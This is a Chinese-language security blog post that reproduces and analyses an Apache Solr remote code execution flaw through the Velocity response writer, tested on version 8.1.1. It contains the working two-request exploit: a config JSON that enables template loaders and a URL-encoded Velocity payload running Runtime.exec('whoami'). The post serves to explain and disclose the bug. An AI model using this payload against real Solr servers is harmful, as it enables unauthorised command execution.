vlambda博客
学习文章列表

漏洞|Apache Solr最新RCE漏洞


关注“安全高手”,做“安全高手!!




学安全、考认证、找工作,做安全高手



漏洞|Apache Solr最新RCE漏洞

引言

Apache Solr爆出RCE 0day漏洞(漏洞编号未给出),这里简单的复现了对象,对整个RCE的流程做了一下分析。


漏洞复现


复现版本:8.1.1

实现RCE,需要分两步,首先确认,应用开启了某个core(可以在Core Admin中查看),实例中应用开启了mycore,





漏洞|Apache Solr最新RCE漏洞


然后先向其config接口发送以下json数据,


{  "update-queryresponsewriter": {    "startup": "lazy",    "name": "velocity",    "class": "solr.VelocityResponseWriter",    "template.base.dir": "",    "solr.resource.loader.enabled": "true",    "params.resource.loader.enabled": "true"  }}





漏洞|Apache Solr最新RCE漏洞


接着访问如下url,即可实现RCE,


/solr/mycore/select?wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27whoami%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end


原理


首先去分析第一个数据包,因为是对mycore的配置,所以我们先把断点打在处理配置请求的SolrConfigHandler的handleRequestBody函数上,





漏洞|Apache Solr最新RCE漏洞


因为是POST的请求,跟进handlePOST函数,


漏洞|Apache Solr最新RCE漏洞


在handlePOST中,先取出mycore的当前配置,再和我们发送的配置同时带进handleCommands函数,并在后续的操作中,最终进到addNamedPlugin函数,创建了一个VelocityResponseWriter对象,该对象的 solr.resource.loader.enabled和params.resource.loader.enabled的值设置成了true,该对象的name为velocity。


漏洞|Apache Solr最新RCE漏洞


然后在发送第二个数据包的时候,在HttpSolrCall.call中获取responseWriter的时候,会根据参数wt的值去获取reponseWriter对象,当wt为velocity时,获取的就是我们精心配置过的VelocityResponseWriter





漏洞|Apache Solr最新RCE漏洞

漏洞|Apache Solr最新RCE漏洞


在后续一连串调用后最终进入我们本次漏洞中最重要的VelocityResponseWriter.write函数,首先调用createEngine函数,生成了包含custom.vrm->payload的恶意template的engine,





漏洞|Apache Solr最新RCE漏洞


恶意的template放在engine的overridingProperties的params.resource.loader.instance和solr.resource.loader.instance中





漏洞|Apache Solr最新RCE漏洞


这里有一个很重要的点,要想让恶意template进入params.resource.loader.instance和solr.resource.loader.instance中,是需要保证paramsResourceLoaderEnabled和solrResourceLoaderEnabled为True的,这也就是我们第一个数据包做的事情,





漏洞|Apache Solr最新RCE漏洞


然后再VelocityResponseWriter.getTemplate就会根据我们提交的v.template参数获取我们构造的恶意template





漏洞|Apache Solr最新RCE漏洞


最终取出了恶意的template,并调用了它的merge方法,





漏洞|Apache Solr最新RCE漏洞


要了解这个template就需要了解一下Velocity Java 模板引擎(因为这个tmplate是org.apache.velocity.Template类对象),官方说法翻译一下如下,


Velocity是一个基于Java的模板引擎。它允许任何人使用简单但功能强大的模板语言来引用Java代码中定义的对象


从这个说法,就能看出这个模板引擎是具有执行java代码的功能的,我们只需了解一下它的基本写法,


// 变量定义#set($name =“velocity”)// 变量赋值#set($foo = $bar)// 函数调用#set($foo =“hello”) #set(foo.name=bar.name) #set(foo.name=bar.getName($arg)) // 循环语法#foreach($element in $list) This is $element $velocityCount#end// 执行模板template.merge(context, writer);


有了上面这些基本的语法介绍,我们就能理解payload的构造方法了,如果希望更深入的了解,可以自行再去查阅Velocity Java 的资料,我们这里不再深入。


于是通过最后调用的恶意template的merge方法,成功造成了RCE,最后补上关键的调用链。





漏洞|Apache Solr最新RCE漏洞


修复方案


目前官方还未给出补丁,建议对solr做一下访问限制吧。


声明:本文版权归作者所有。文章仅代表作者独立观点,转载目的在于传递信息。如有侵权,请联系 [email protected]





漏洞|Apache Solr最新RCE漏洞
干货推荐








漏洞|Apache Solr最新RCE漏洞

扫码关注

你就是下一个

安全高手

漏洞|Apache Solr最新RCE漏洞


猛戳下方去

“网络安全云学院”